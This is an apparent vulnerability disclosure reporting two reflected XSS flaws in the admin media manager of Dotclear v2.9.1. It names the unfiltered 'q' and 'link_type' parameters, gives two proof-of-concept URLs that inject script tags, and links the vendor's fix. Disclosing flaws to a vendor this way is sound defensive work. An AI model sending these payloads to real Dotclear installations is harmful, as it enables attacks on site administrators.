Dotclear v2.9.1 XSS vulns
Posted on 30 November -0001
<HTML><HEAD><TITLE>Dotclear v2.9.1 XSS vulns</TITLE><META http-equiv="Content-Type" content="text/html; charset=utf-8"></HEAD><BODY>Title: XSS vulns in Dotclear v2.9.1 Author: Chen Ruiqi, Chenruiqi () 360 cn Date: 2016-08-01 Download Site: https://dotclear.org/download Vendor: dotclear.org Vendor Notified: 2016-08-01 Vendor Contact: security () dotclear net -------------------------------------------------------------------------------------------------------- Discription: Dotclear is an open source blog publishing application distributed under the GNU GPLv2. Developed originally by Olivier Meunier from 2002, Dotclear has now attracted a solid team of developers.[2] It is relatively popular in French speaking countries, where it is used by several major blogging platforms (Gandi Blogs,[3] Marine nationale,[4] etc.).(Wiki) ----------------------------------------------------------------------------------------------------------- Vulnerability: There are two reflected XSS vulns in Dotclear v2.9.1 media manager /admin/media.php line 34 $link_type = !empty($_REQUEST['link_type']) ? $_REQUEST['link_type'] : null; line 62 $q = isset($_REQUEST['q']) ? $_REQUEST['q'] : null; Lack of filter before put the user-input into the page. -------------------------------------------------------------------------------------------------------- PoC Code: http://*.*.*.*/dotclear/admin/media.php?q=77777%3C%2Fspan%3E%3Cscript%3Ealert(1)%3C/script%3E&popup=0&select=0&plugin_id=&post_id=&link_type= http://*.*.*.*/dotclear/admin/media.php?q=77777&popup=0&select=0&plugin_id=&post_id=&link_type=8888%22%3E%3Cscript%3Ealert(1)%3C/script%3E ---------------------------------------------------------------------------------------------------------- Fix Code: https://hg.dotclear.org/dotclear/rev/40d0207e520d </BODY></HTML>
